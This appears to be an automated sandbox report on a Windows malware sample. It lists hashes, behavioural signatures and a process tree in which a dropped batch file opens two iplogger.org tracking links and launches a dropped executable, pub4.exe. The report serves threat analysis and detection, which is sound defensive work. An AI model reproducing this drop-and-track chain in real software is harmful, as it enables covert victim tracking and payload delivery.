Analysis

  • max time kernel
    36s
  • max time network
    89s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220113
  • submitted
    06-02-2022 13:12

General

  • Target

    45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe

  • Size

    5.7MB

  • MD5

    5d9500398ebb9e211512cac02183eadb

  • SHA1

    6d249f3a6480f359d8a203594f1f199d87dd8b37

  • SHA256

    45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c

  • SHA512

    5f3274446838b01f341f811f4abbf7219bd3b7c136fadbb0ccde3e94e4908ca0bb366db3163a8109869002b6a462cbcb27f1df14e3db8460c34d4414429e64b3

Score
8/10

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious use of WriteProcessMemory 14 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe
    "C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2696
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\DreamTrips.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4572
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1qzLu7
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2300
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffbf6eb46f8,0x7ffbf6eb4708,0x7ffbf6eb4718
          4⤵
            PID:3648
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/14Ahe7
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4068
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffbf6eb46f8,0x7ffbf6eb4708,0x7ffbf6eb4718
            4⤵
              PID:3632
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\pub4.exe
          "C:\Users\Admin\AppData\Local\Temp\RarSFX0\pub4.exe"
          2⤵
          • Executes dropped EXE
          PID:3500

      Network

      MITRE ATT&CK Enterprise v6

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

        MD5

        78afdcc28744f3ccc897189551e60a14

        SHA1

        6408c2447363d821dc659254a324456ed16207ec

        SHA256

        ad06579bc070fec03adb35db5fcba1015c52ac2c5dd2ffec9ecff4301bfe70c7

        SHA512

        8e6e1433fef7868a51e78fe1f899afe608e1dc2dcf86a02f21fe579fa4b4eef36a9a63628a443067203e19cd31971d6599cccd091b74e1d5fca5d2aff4428078

      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\DreamTrips.bat

        MD5

        c25faf98d787b358c72543e7e11917c8

        SHA1

        911d1eb09ba90b071795842089d57d741f959ee3

        SHA256

        86d72c90e984ebbaf8917bc49c16a68752f8e1e73e59f61eb004eb0b92e1ad40

        SHA512

        b7e97564dcccc813cda0d6632fb5229a231b2606c2a3b01addb0b2889e7b20c433760b95b7f8273ff2fa423a848fde7aa8ef13b52605e93520b7475815cc2720

      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\pub4.exe

        MD5

        9d7fb45d27ca947c3de8dfc20a4bfe65

        SHA1

        1669a4eb54494813218d1753b8faa1c6bc88dc0a

        SHA256

        ca2c2265df617e8932693569c3e6e109ff244599ca268a7e4fd0f7e5edbdfff5

        SHA512

        2b82880e4de3311f93197d7433c83ec8e3f41e69e99db1c665b69807ef4716de6ca0cf1da340a30c03ca7b4810f767b7766733ec25d07e1a143d1208607d5558